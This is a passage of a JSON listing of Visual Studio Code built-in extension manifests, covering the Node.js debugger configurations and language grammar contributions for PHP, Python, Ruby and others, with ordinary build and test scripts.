editor","default":true}}}},"dependencies":{"vscode-extension-telemetry":"0.0.8","vscode-nls":"^2.0.2"},"devDependencies":{"@types/node":"8.0.33"},"isBuiltin":true,"id":"vscode.merge-conflict","extensionFolderPath":"/usr/share/code/resources/app/extensions/merge-conflict"},{"name":"node-debug","displayName":"Node Debug","version":"1.19.8","publisher":"ms-vscode","description":"Visual Studio Code debugger extension for Node.js","icon":"images/node-debug-icon.png","categories":["Debuggers"],"author":{"name":"Microsoft Corporation"},"license":"MIT","private":true,"scripts":{"postinstall":"node ./node_modules/vscode/bin/install","build":"gulp build","watch":"gulp watch","test":"mocha --timeout 10000 -u tdd ./out/tests/","nodemon":"nodemon --debug --nolazy ./out/node/nodeDebug.js --server=4711","prepublish":"gulp build"},"keywords":["multi-root ready"],"engines":{"vscode":"^1.19.0","node":"^7.4.0"},"extensionDependencies":["ms-vscode.node-debug2"],"dependencies":{"vscode-debugadapter":"1.25.0","source-map":"0.6.1","vscode-nls":"2.0.2","request-light":"0.2.1","glob":"7.1.2","minimatch":"3.0.4"},"repository":{"type":"git","url":"https://github.com/Microsoft/vscode-node-debug.git"},"bugs":{"url":"https://github.com/Microsoft/vscode-node-debug/issues"},"devDependencies":{"@types/mocha":"2.2.44","@types/node":"7.0.43","@types/source-map":"0.5.2","gulp":"3.9.1","gulp-util":"3.0.8","gulp-typescript":"3.2.2","gulp-tsb":"2.0.4","gulp-sourcemaps":"2.6.1","gulp-filter":"5.0.1","gulp-tslint":"8.1.2","gulp-uglify":"2.0.0","tslint-microsoft-contrib":"5.0.1","del":"3.0.0","run-sequence":"2.2.0","mocha":"4.0.1","tslint":"5.8.0","tsutils":"2.12.2","typescript":"2.6.1","vscode":"1.1.8","vscode-nls-dev":"2.1.6","vscode-debugadapter-testsupport":"1.25.0","vscode-debugprotocol":"1.25.0","event-stream":"3.3.4","nodemon":"1.12.1","vsce":"1.33.2"},"main":"/usr/share/code/resources/app/extensions/ms-vscode.node-debug/out/node/extension/extension.js","activationEvents":["onDebugInitialConfigurations","onDebugResolve:node","onCommand:extension.node-debug.toggleSkippingFile","onCommand:extension.node-debug.pickLoadedScript","onCommand:extension.pickNodeProcess"],"contributes":{"views":{"debug":[{"id":"extension.node-debug.loadedScriptsExplorer.node","name":"Loaded Scripts","when":"inDebugMode && debugType == 'node'"},{"id":"extension.node-debug.loadedScriptsExplorer.node2","name":"Loaded Scripts","when":"inDebugMode && debugType == 'node2'"},{"id":"extension.node-debug.loadedScriptsExplorer.extensionHost","name":"Loaded Scripts","when":"inDebugMode && debugType == 'extensionHost'"},{"id":"extension.node-debug.loadedScriptsExplorer.chrome","name":"Loaded Scripts","when":"inDebugMode && debugType == 'chrome'"}]},"menus":{"debug/callstack/context":[{"command":"extension.node-debug.toggleSkippingFile","group":"navigation","when":"inDebugMode && debugType == 'node'"}]},"commands":[{"command":"extension.node-debug.pickLoadedScript","title":"Open Loaded Script","category":"Debug"},{"command":"extension.node-debug.toggleSkippingFile","title":"Toggle Skipping this File"}],"keybindings":[{"command":"extension.node-debug.pickLoadedScript","key":"ctrl+f4","mac":"cmd+f4","when":"debugType == 'node'"}],"breakpoints":[{"language":"javascript"},{"language":"javascriptreact"}],"debuggers":[{"type":"node","label":"Node.js","program":"./out/node/nodeDebug.js","runtime":"node","variables":{"PickProcess":"extension.pickNodeProcess"},"aiKey":"AIF-d9b70cd4-b9f9-4d70-929b-a071c400b217","languages":["javascript","typescript","javascriptreact","typescriptreact"],"configurationSnippets":[{"label":"Node.js: Launch Program","description":"Launch a node program in debug mode","body":{"type":"node","request":"launch","name":"${2:Launch Program}","program":"^\"\\${workspaceFolder}/${1:app.js}\""}},{"label":"Node.js: Launch via NPM","description":"Launch a node program through an npm 'debug' script","body":{"type":"node","request":"launch","name":"${1:Launch via NPM}","runtimeExecutable":"npm","runtimeArgs":["run-script","debug"],"port":9229}},{"label":"Node.js: Attach","description":"Attach to a running node program","body":{"type":"node","request":"attach","name":"${1:Attach}","port":9229}},{"label":"Node.js: Attach to Remote Program","description":"Attach to the debug port of a remote node program","body":{"type":"node","request":"attach","name":"${1:Attach to Remote}","address":"${2:TCP/IP address of process to be debugged}","port":9229,"localRoot":"^\"\\${workspaceFolder}\"","remoteRoot":"${3:Absolute path to the remote directory containing the program}"}},{"label":"Node.js: Attach to Process","description":"Open process picker to select node or gulp process to attach to","body":{"type":"node","request":"attach","name":"${1:Attach by Process ID}","processId":"^\"\\${command:PickProcess}\""}},{"label":"Node.js: Nodemon Setup","description":"Use nodemon to relaunch a debug session on source changes","body":{"type":"node","request":"launch","name":"nodemon","runtimeExecutable":"nodemon","program":"^\"\\${workspaceFolder}/${1:app.js}\"","restart":true,"console":"integratedTerminal","internalConsoleOptions":"neverOpen"}},{"label":"Node.js: Mocha Tests","description":"Debug mocha tests","body":{"type":"node","request":"launch","name":"Mocha Tests","program":"^\"\\${workspaceFolder}/node_modules/mocha/bin/_mocha\"","args":["-u","tdd","--timeout","999999","--colors","^\"\\${workspaceFolder}/${1:test}\""],"internalConsoleOptions":"openOnSessionStart"}},{"label":"Node.js: Yeoman generator","description":"Debug yeoman generator (install by running 'npm link' in project folder)","body":{"type":"node","request":"launch","name":"Yeoman ${1:generator}","program":"^\"\\${workspaceFolder}/node_modules/yo/lib/cli.js\"","args":["${1:generator}"],"console":"integratedTerminal","internalConsoleOptions":"neverOpen"}},{"label":"Node.js: Gulp task","description":"Debug gulp task (make sure to have a local gulp installed in your project)","body":{"type":"node","request":"launch","name":"Gulp ${1:task}","program":"^\"\\${workspaceFolder}/node_modules/gulp/bin/gulp.js\"","args":["${1:task}"]}},{"label":"Node.js: Electron Main","description":"Debug the Electron main process","body":{"type":"node","request":"launch","name":"Electron Main","runtimeExecutable":"^\"\\${workspaceFolder}/node_modules/.bin/electron\"","program":"^\"\\${workspaceFolder}/main.js\"","protocol":"legacy"}}],"configurationAttributes":{"launch":{"properties":{"protocol":{"type":"string","enum":["auto","inspector","legacy"],"enumDescriptions":["try to detect the best protocol automatically, selecting 'inspector' for launching Node 8.0+","new protocol supported by Node.js versions >= 6.3","old protocol supported by Node.js versions < 8.0"],"description":"Node.js debug protocol to use.","default":"inspector"},"program":{"type":"string","description":"Absolute path to the program. Generated value is guessed by looking at package.json and opened files. Edit this attribute."},"stopOnEntry":{"type":"boolean","description":"Automatically stop program after launch.","default":true},"externalConsole":{"type":"boolean","deprecationMessage":"Attribute 'externalConsole' is deprecated, use 'console' instead.","default":true},"console":{"type":"string","enum":["internalConsole","integratedTerminal","externalTerminal"],"enumDescriptions":["VS Code Debug Console (which doesn't support to read input from a program)","VS Code's integrated terminal","external terminal that can be configured via user settings"],"description":"Where to launch the debug target.","default":"internalConsole"},"args":{"type":"array","description":"Command line arguments passed to the program.","items":{"type":"string"},"default":[]},"cwd":{"type":"string","description":"Absolute path to the working directory of the program being debugged.","default":"${workspaceFolder}"},"runtimeExecutable":{"type":["string","null"],"description":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If omitted 'node' is assumed.","default":"node"},"runtimeArgs":{"type":"array","description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"default":[]},"env":{"type":"object","additionalProperties":{"type":["string","null"]},"description":"Environment variables passed to the program. The value 'null' removes the variable from the environment.","default":{}},"envFile":{"type":"string","description":"Absolute path to a file containing environment variable definitions.","default":"${workspaceFolder}/.env"},"sourceMaps":{"type":"boolean","description":"Use JavaScript source maps (if they exist).","default":true},"outDir":{"type":["string","null"],"deprecationMessage":"Attribute 'outDir' is deprecated, use 'outFiles' instead.","default":null},"outFiles":{"type":"array","description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with '!' the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"default":[]},"port":{"type":"number","description":"Debug port to attach to. Default is 5858.","default":9229},"address":{"type":"string","description":"TCP/IP address of process to be debugged (for Node.js >= 5.0 only). Default is 'localhost'.","default":"localhost"},"timeout":{"type":"number","description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","default":10000},"restart":{"type":"boolean","description":"Restart session after Node.js has terminated.","default":true},"localRoot":{"type":["string","null"],"description":"Path to the local directory containing the program.","default":null},"remoteRoot":{"type":["string","null"],"description":"Absolute path to the remote directory containing the program.","default":null},"smartStep":{"type":"boolean","description":"Automatically step through generated code that cannot be mapped back to the original source.","default":true},"skipFiles":{"type":"array","description":"An array of glob patterns for files to skip when debugging.","items":{"type":"string"},"default":[]},"showAsyncStacks":{"type":"boolean","description":"Show the async calls that led to the current call stack. 'inspector' protocol only.","default":true},"useWSL":{"type":"boolean","description":"Use Windows Subsystem Linux.","default":true},"trace":{"type":["boolean","string"],"description":"Produce diagnostic output. Instead of setting this to true you can list one or more selectors separated with commas. The 'verbose' selector enables very detailled output.","default":true},"outputCapture":{"enum":["console","std"],"description":"From where to capture output messages: The debug API, or stdout/stderr streams.","default":"console"},"sourceMapPathOverrides":{"type":"object","description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","default":{"webpack:///./~/*":"${workspaceRoot}/node_modules/*","webpack:///./*":"${workspaceRoot}/*","webpack:///*":"*"}}}},"attach":{"properties":{"protocol":{"type":"string","enum":["auto","inspector","legacy"],"enumDescriptions":["try to detect the best protocol automatically, selecting 'inspector' for launching Node 8.0+","new protocol supported by Node.js versions >= 6.3","old protocol supported by Node.js versions < 8.0"],"description":"Node.js debug protocol to use.","default":"inspector"},"cwd":{"type":"string","description":"Absolute path to the working directory of the program being debugged.","default":"${workspaceFolder}"},"processId":{"type":"string","description":"Id of process to attach to.","default":"${command:PickProcess}"},"port":{"type":"number","description":"Debug port to attach to. Default is 5858.","default":9229},"address":{"type":"string","description":"TCP/IP address of process to be debugged (for Node.js >= 5.0 only). Default is 'localhost'.","default":"localhost"},"timeout":{"type":"number","description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","default":10000},"restart":{"type":"boolean","description":"Restart session after Node.js has terminated.","default":true},"sourceMaps":{"type":"boolean","description":"Use JavaScript source maps (if they exist).","default":true},"outDir":{"type":["string","null"],"deprecationMessage":"Attribute 'outDir' is deprecated, use 'outFiles' instead.","default":null},"outFiles":{"type":"array","description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with '!' the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"default":[]},"stopOnEntry":{"type":"boolean","description":"Automatically stop program after launch.","default":true},"localRoot":{"type":["string","null"],"description":"Path to the local directory containing the program.","default":null},"remoteRoot":{"type":["string","null"],"description":"Absolute path to the remote directory containing the program.","default":null},"smartStep":{"type":"boolean","description":"Automatically step through generated code that cannot be mapped back to the original source.","default":true},"skipFiles":{"type":"array","description":"An array of glob patterns for files to skip when debugging.","items":{"type":"string"},"default":[]},"showAsyncStacks":{"type":"boolean","description":"Show the async calls that led to the current call stack. 'inspector' protocol only.","default":true},"trace":{"type":["boolean","string"],"description":"Produce diagnostic output. Instead of setting this to true you can list one or more selectors separated with commas. The 'verbose' selector enables very detailled output.","default":true},"sourceMapPathOverrides":{"type":"object","description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","default":{"webpack:///./~/*":"${workspaceRoot}/node_modules/*","webpack:///./*":"${workspaceRoot}/*","webpack:///*":"*"}}}}}}]},"uuid":"b6ded8fb-a0a0-4c1c-acbd-ab2a3bc995a6","isBuiltin":true,"id":"ms-vscode.node-debug","extensionFolderPath":"/usr/share/code/resources/app/extensions/ms-vscode.node-debug"},{"name":"node-debug2","displayName":"Node Debug 2","version":"1.19.4","publisher":"ms-vscode","description":"Visual Studio Code debugger extension for Node.js v6.3+, using the new Inspector Protocol","icon":"images/node-debug-icon.png","categories":["Debuggers"],"author":{"name":"Microsoft Corporation"},"license":"MIT","private":true,"dependencies":{"vscode-chrome-debug-core":"^3.20.3","vscode-debugadapter":"^1.25.0","vscode-nls":"^2.0.2"},"devDependencies":{"@types/mocha":"^2.2.32","@types/node":"^6.0.52","@types/source-map":"^0.1.27","del":"^2.2.2","event-stream":"^3.3.4","find-free-port":"^1.0.2","gulp":"^3.9.1","gulp-sourcemaps":"^2.2.0","gulp-tslint":"^8.1.2","gulp-typescript":"^3.1.3","gulp-util":"^3.0.5","mocha":"^3.1.1","run-sequence":"^1.2.2","tslint":"^5.7.0","typescript":"^2.6.2","vsce":"^1.33.2","vscode":"^1.1.9","vscode-chrome-debug-core-testsupport":"^3.20.0","vscode-debugadapter-testsupport":"^1.25.0","vscode-debugprotocol":"^1.25.0","vscode-nls-dev":"^2.1.6"},"main":"/usr/share/code/resources/app/extensions/ms-vscode.node-debug2/out/src/extension","activationEvents":["onCommand:extension.node-debug2.toggleSkippingFile"],"scripts":{"postinstall":"node ./node_modules/vscode/bin/install","build":"gulp build","watch":"gulp watch","test":"mocha --timeout 20000 -s 2000 -u tdd --colors --reporter node_modules/vscode-chrome-debug-core-testsupport/out/loggingReporter.js ./out/test/","vscode:prepublish":"gulp verify-no-linked-modules && gulp build"},"engines":{"vscode":"^1.14.0","node":"^6.3.0"},"repository":{"type":"git","url":"https://github.com/Microsoft/vscode-node-debug2.git"},"bugs":{"url":"https://github.com/Microsoft/vscode-node-debug2/issues"},"contributes":{"breakpoints":[{"language":"javascript"},{"language":"javascriptreact"}],"debuggers":[{"type":"extensionHost","label":"VS Code Extension Development","program":"./out/src/nodeDebug.js","runtime":"node","aiKey":"AIF-d9b70cd4-b9f9-4d70-929b-a071c400b217","configurationSnippets":[{"label":"VS Code Extension Development","description":"Launch a VS Code extension in debug mode","body":{"type":"extensionHost","request":"launch","name":"Launch Extension","runtimeExecutable":"^\"\\${execPath}\"","args":["^\"--extensionDevelopmentPath=\\${workspaceFolder}\""],"outFiles":["^\"\\${workspaceFolder}/out/**/*.js\""],"preLaunchTask":"npm"}}],"configurationAttributes":{"launch":{"required":["runtimeExecutable","args"],"properties":{"runtimeExecutable":{"type":["string","null"],"description":"Absolute path to VS Code.","default":"${execPath}"},"args":{"type":"array","description":"Command line arguments passed to the program.","items":{"type":"string"},"default":["--extensionDevelopmentPath=${workspaceFolder}"]},"env":{"type":"object","additionalProperties":{"type":["string","null"]},"description":"Environment variables passed to the extension host.","default":{}},"stopOnEntry":{"type":"boolean","description":"Automatically stop the extension host after launch.","default":true},"sourceMaps":{"type":"boolean","description":"Use JavaScript source maps (if they exist).","default":true},"outDir":{"type":["string","null"],"deprecationMessage":"Attribute 'outDir' is deprecated, use 'outFiles' instead.","default":"${workspaceFolder}/out"},"outFiles":{"type":"array","description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with '!' the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"default":["${workspaceFolder}/out/**/*.js"]},"smartStep":{"type":"boolean","description":"Automatically step through generated code that cannot be mapped back to the original source.","default":true},"skipFiles":{"type":"array","description":"An array of file or folder names, or glob patterns, to skip when debugging.","items":{"type":"string"},"default":[]},"trace":{"type":["boolean","string"],"description":"When 'true', the debugger will log tracing info to a file. When 'verbose', it will also show logs in the console.","default":true}}}}},{"type":"node2","label":"Node.js v6.3+","program":"./out/src/nodeDebug.js","runtime":"node","aiKey":"AIF-d9b70cd4-b9f9-4d70-929b-a071c400b217","configurationAttributes":{"launch":{"required":["cwd"],"properties":{"program":{"type":"string","description":"Absolute path to the program."},"stopOnEntry":{"type":"boolean","description":"Automatically stop program after launch.","default":true},"console":{"enum":["internalConsole","integratedTerminal","externalTerminal"],"description":"Where to launch the debug target: internal console, integrated terminal, or external terminal.","default":"internalConsole"},"args":{"type":"array","description":"Command line arguments passed to the program.","items":{"type":"string"},"default":[]},"restart":{"type":"boolean","description":"Restart session after Node.js has terminated.","default":true},"cwd":{"type":"string","description":"Absolute path to the working directory of the program being debugged.","default":"${workspaceFolder}"},"runtimeExecutable":{"type":["string","null"],"description":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If ommitted 'node' is assumed.","default":null},"runtimeArgs":{"type":"array","description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"default":[]},"env":{"type":"object","additionalProperties":{"type":"string"},"description":"Environment variables passed to the program. The value 'null' removes the variable from the environment.","default":{}},"sourceMaps":{"type":"boolean","description":"Use JavaScript source maps (if they exist).","default":true},"outDir":{"type":["string","null"],"deprecationMessage":"Attribute 'outDir' is deprecated, use 'outFiles' instead.","default":null},"outFiles":{"type":"array","description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with '!' the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"default":[]},"port":{"type":"number","description":"Debug port to attach to. Default is 9229.","default":9229},"address":{"type":"string","description":"TCP/IP address of debug port. Default is 'localhost'.","default":"localhost"},"timeout":{"type":"number","description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","default":10000},"smartStep":{"type":"boolean","description":"Automatically step through generated code that cannot be mapped back to the original source.","default":true},"diagnosticLogging":{"type":"boolean","description":"When true, the adapter logs its own diagnostic info to the console","default":true,"deprecationMessage":"'diagnosticLogging' is deprecated. Use 'trace' instead."},"verboseDiagnosticLogging":{"type":"boolean","description":"When true, the adapter logs all traffic with the client and target (as well as the info logged by 'diagnosticLogging')","default":true,"deprecationMessage":"'verboseDiagnosticLogging' is deprecated. Use 'trace' instead."},"trace":{"type":["boolean","string"],"enum":["verbose",true],"default":true,"description":"When 'true', the debugger will log tracing info to a file. When 'verbose', it will also show logs in the console."},"sourceMapPathOverrides":{"type":"object","description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk. See README for details.","default":{}},"skipFiles":{"type":"array","description":"An array of file or folder names, or glob patterns, to skip when debugging.","default":[]},"envFile":{"type":"string","description":"Absolute path to a file containing environment variable definitions.","default":"${workspaceFolder}/.env"},"showAsyncStacks":{"type":"boolean","description":"Show the async calls that led to the current call stack.","default":true},"outputCapture":{"enum":["console","std"],"description":"From where to capture output messages: The debug API, or stdout/stderr streams.","default":"console"}}},"attach":{"properties":{"port":{"type":"number","description":"Debug port to attach to. Default is 9229.","default":9229},"address":{"type":"string","description":"TCP/IP address of debug port. Default is 'localhost'.","default":"localhost"},"timeout":{"type":"number","description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","default":10000},"restart":{"type":"boolean","description":"Restart session after Node.js has terminated.","default":true},"sourceMaps":{"type":"boolean","description":"Use JavaScript source maps (if they exist).","default":true},"outDir":{"type":["string","null"],"deprecationMessage":"Attribute 'outDir' is deprecated, use 'outFiles' instead.","default":null},"outFiles":{"type":"array","description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with '!' the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"default":[]},"stopOnEntry":{"type":"boolean","description":"Automatically stop program after launch.","default":true},"localRoot":{"type":["string","null"],"description":"The local source root that corresponds to the 'remoteRoot'.","default":null},"remoteRoot":{"type":["string","null"],"description":"The source root of the remote host.","default":null},"smartStep":{"type":"boolean","description":"Automatically step through generated code that cannot be mapped back to the original source.","default":true},"diagnosticLogging":{"type":"boolean","description":"When true, the adapter logs its own diagnostic info to the console","default":true,"deprecationMessage":"'diagnosticLogging' is deprecated. Use 'trace' instead."},"verboseDiagnosticLogging":{"type":"boolean","description":"When true, the adapter logs all traffic with the client and target (as well as the info logged by 'diagnosticLogging')","default":true,"deprecationMessage":"'verboseDiagnosticLogging' is deprecated. Use 'trace' instead."},"trace":{"type":["boolean","string"],"enum":["verbose",true],"default":true,"description":"When 'true', the debugger will log tracing info to a file. When 'verbose', it will also show logs in the console."},"sourceMapPathOverrides":{"type":"object","description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk. See README for details.","default":{}},"skipFiles":{"type":"array","description":"An array of file or folder names, or glob patterns, to skip when debugging.","default":[]},"showAsyncStacks":{"type":"boolean","description":"Show the async calls that led to the current call stack.","default":true}}}}}],"menus":{"debug/callstack/context":[{"command":"extension.node-debug2.toggleSkippingFile","group":"navigation","when":"inDebugMode && debugType == 'node2'"}]},"commands":[{"command":"extension.node-debug2.toggleSkippingFile","title":"Toggle Skipping this File"}],"keybindings":[{"command":"extension.node-debug.pickLoadedScript","key":"ctrl+f4","mac":"cmd+f4","when":"debugType == 'node2'"}]},"uuid":"36d19e17-7569-4841-a001-947eb18602b2","isBuiltin":true,"id":"ms-vscode.node-debug2","extensionFolderPath":"/usr/share/code/resources/app/extensions/ms-vscode.node-debug2"},{"name":"npm","publisher":"vscode","description":"Extension to add task support for npm scripts.","displayName":"Npm support for VSCode","version":"0.0.1","engines":{"vscode":"0.10.x"},"categories":["Other"],"scripts":{"compile":"gulp compile-extension:npm","watch":"gulp watch-extension:npm"},"dependencies":{"vscode-nls":"^2.0.2"},"devDependencies":{"@types/node":"7.0.43"},"main":"/usr/share/code/resources/app/extensions/npm/out/main","activationEvents":["onCommand:workbench.action.tasks.runTask"],"contributes":{"configuration":{"id":"npm","type":"object","title":"Npm","properties":{"npm.autoDetect":{"type":"string","enum":["off","on"],"default":"on","scope":"resource","description":"Controls whether auto detection of npm scripts is on or off. Default is on."},"npm.runSilent":{"type":"boolean","default":false,"scope":"resource","description":"Run npm commands with the `--silent` option."},"npm.packageManager":{"scope":"resource","type":"string","enum":["npm","yarn"],"default":"npm","description":"The package manager used to run scripts."}}},"taskDefinitions":[{"type":"npm","required":["script"],"properties":{"script":{"type":"string","description":"The npm script to customize"},"path":{"type":"string","description":"The path to the folder of the package.json file that provides the script. Can be ommitted."}}}]},"isBuiltin":true,"id":"vscode.npm","extensionFolderPath":"/usr/share/code/resources/app/extensions/npm"},{"name":"objective-c","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js atom/language-objective-c grammars/objective-c.cson ./syntaxes/objective-c.tmLanguage.json && node ../../build/npm/update-grammar.js atom/language-objective-c grammars/objective-c%2B%2B.cson ./syntaxes/objective-c++.tmLanguage.json"},"contributes":{"languages":[{"id":"objective-c","extensions":[".m"],"aliases":["Objective-C"],"configuration":"./language-configuration.json"},{"id":"objective-cpp","extensions":[".mm"],"aliases":["Objective-C++"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"objective-c","scopeName":"source.objc","path":"./syntaxes/objective-c.tmLanguage.json"},{"language":"objective-cpp","scopeName":"source.objcpp","path":"./syntaxes/objective-c++.tmLanguage.json"}]},"isBuiltin":true,"id":"vscode.objective-c","extensionFolderPath":"/usr/share/code/resources/app/extensions/objective-c"},{"name":"perl","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js textmate/perl.tmbundle Syntaxes/Perl.plist ./syntaxes/perl.tmLanguage.json Syntaxes/Perl%206.tmLanguage ./syntaxes/perl6.tmLanguage.json"},"contributes":{"languages":[{"id":"perl","aliases":["Perl","perl"],"extensions":[".pl",".pm",".pod",".t",".PL",".psgi"],"firstLine":"^#!.*\\bperl\\b","configuration":"./perl.language-configuration.json"},{"id":"perl6","aliases":["Perl 6","perl6"],"extensions":[".p6",".pl6",".pm6",".nqp"],"firstLine":"(^#!.*\\bperl6\\b)|use\\s+v6","configuration":"./perl6.language-configuration.json"}],"grammars":[{"language":"perl","scopeName":"source.perl","path":"./syntaxes/perl.tmLanguage.json"},{"language":"perl6","scopeName":"source.perl.6","path":"./syntaxes/perl6.tmLanguage.json"}]},"isBuiltin":true,"id":"vscode.perl","extensionFolderPath":"/usr/share/code/resources/app/extensions/perl"},{"name":"php","version":"0.1.0","publisher":"vscode","engines":{"vscode":"0.10.x"},"activationEvents":["onLanguage:php"],"main":"/usr/share/code/resources/app/extensions/php/out/phpMain","dependencies":{"vscode-nls":"^1.0.4"},"contributes":{"languages":[{"id":"php","extensions":[".php",".php4",".php5",".phtml",".ctp"],"aliases":["PHP","php"],"firstLine":"^#!/.*\\bphp\\b","mimetypes":["application/x-php"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"php","scopeName":"text.html.php","path":"./syntaxes/php.tmLanguage.json","embeddedLanguages":{"text.html":"html","source.php":"php","source.sql":"sql","text.xml":"xml","source.js":"javascript","source.json":"json","source.css":"css"}}],"snippets":[{"language":"php","path":"./snippets/php.snippets.json"}],"configuration":{"title":"PHP","type":"object","order":20,"properties":{"php.suggest.basic":{"type":"boolean","default":true,"description":"Configures if the built-in PHP language suggestions are enabled. The support suggests PHP globals and variables."},"php.validate.enable":{"type":"boolean","default":true,"description":"Enable/disable built-in PHP validation."},"php.validate.executablePath":{"type":["string","null"],"default":null,"description":"Points to the PHP executable."},"php.validate.run":{"type":"string","enum":["onSave","onType"],"default":"onSave","description":"Whether the linter is run on save or on type."}}},"jsonValidation":[{"fileMatch":"composer.json","url":"https://getcomposer.org/schema.json"}],"commands":[{"title":"Disallow PHP validation executable (defined as workspace setting)","category":"PHP","command":"php.untrustValidationExecutable"}],"menus":{"commandPalette":[{"command":"php.untrustValidationExecutable","when":"php.untrustValidationExecutableContext"}]}},"scripts":{"compile":"gulp compile-extension:php","watch":"gulp watch-extension:php","update-grammar":"node ./build/update-grammar.js"},"devDependencies":{"@types/node":"7.0.43"},"isBuiltin":true,"id":"vscode.php","extensionFolderPath":"/usr/share/code/resources/app/extensions/php"},{"name":"powershell","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"contributes":{"languages":[{"id":"powershell","extensions":[".ps1",".psm1",".psd1",".pssc",".psrc"],"aliases":["PowerShell","powershell","ps","ps1"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"powershell","scopeName":"source.powershell","path":"./syntaxes/PowershellSyntax.tmLanguage"}],"snippets":[{"language":"powershell","path":"./snippets/powershell.json"}]},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js SublimeText/PowerShell Support/PowershellSyntax.tmLanguage ./syntaxes/powershell.tmLanguage.json"},"isBuiltin":true,"id":"vscode.powershell","extensionFolderPath":"/usr/share/code/resources/app/extensions/powershell"},{"name":"pug","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js davidrios/jade-tmbundle Syntaxes/Jade.tmLanguage ./syntaxes/pug.tmLanguage.json"},"contributes":{"languages":[{"id":"jade","extensions":[".jade",".pug"],"aliases":["Pug","Jade","jade"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"jade","scopeName":"text.jade","path":"./syntaxes/pug.tmLanguage.json"}]},"isBuiltin":true,"id":"vscode.pug","extensionFolderPath":"/usr/share/code/resources/app/extensions/pug"},{"name":"python","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"activationEvents":["onLanguage:python"],"main":"/usr/share/code/resources/app/extensions/python/out/pythonMain","contributes":{"languages":[{"id":"python","extensions":[".py",".rpy",".pyw",".cpy",".gyp",".gypi"],"aliases":["Python","py"],"firstLine":"^#!/.*\\bpython[0-9.-]*\\b","configuration":"./language-configuration.json"}],"grammars":[{"language":"python","scopeName":"source.python","path":"./syntaxes/MagicPython.tmLanguage.json"},{"scopeName":"source.regexp.python","path":"./syntaxes/MagicRegExp.tmLanguage.json"}]},"scripts":{"compile":"gulp compile-extension:python","watch":"gulp watch-extension:python","update-grammar":"node ../../build/npm/update-grammar.js MagicStack/MagicPython grammars/MagicPython.tmLanguage ./syntaxes/MagicPython.tmLanguage.json grammars/MagicRegExp.tmLanguage ./syntaxes/MagicRegExp.tmLanguage.json"},"isBuiltin":true,"id":"vscode.python","extensionFolderPath":"/usr/share/code/resources/app/extensions/python"},{"name":"r","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js Ikuyadeu/vscode-R syntax/r.json ./syntaxes/r.tmLanguage.json"},"contributes":{"languages":[{"id":"r","extensions":[".r",".rhistory",".rprofile",".rt"],"aliases":["R","r"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"r","scopeName":"source.r","path":"./syntaxes/r.tmLanguage.json"}]},"isBuiltin":true,"id":"vscode.r","extensionFolderPath":"/usr/share/code/resources/app/extensions/r"},{"name":"razor","version":"0.1.0","publisher":"vscode","engines":{"vscode":"0.10.x"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js demyte/language-cshtml grammars/cshtml.json ./syntaxes/cshtml.json"},"contributes":{"languages":[{"id":"razor","extensions":[".cshtml"],"aliases":["Razor","razor"],"mimetypes":["text/x-cshtml"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"razor","scopeName":"text.html.cshtml","path":"./syntaxes/cshtml.json","embeddedLanguages":{"section.embedded.source.cshtml":"csharp"}}]},"isBuiltin":true,"id":"vscode.razor","extensionFolderPath":"/usr/share/code/resources/app/extensions/razor"},{"name":"ruby","version":"0.2.1","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js textmate/ruby.tmbundle Syntaxes/Ruby.plist ./syntaxes/ruby.tmLanguage.json"},"contributes":{"languages":[{"id":"ruby","extensions":[".rb",".rbx",".rjs",".gemspec",".rake",".ru",".erb"],"filenames":["rakefile","gemfile","guardfile","podfile","capfile"],"aliases":["Ruby","rb"],"firstLine":"^#!/.*\\bruby\\b","configuration":"./language-configuration.json"}],"grammars":[{"language":"ruby","scopeName":"source.ruby","path":"./syntaxes/ruby.tmLanguage.json"}]},"isBuiltin":true,"id":"vscode.ruby","extensionFolderPath":"/usr/share/code/resources/app/extensions/ruby"},{"name":"rust","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js zargony/atom-language-rust grammars/rust.cson 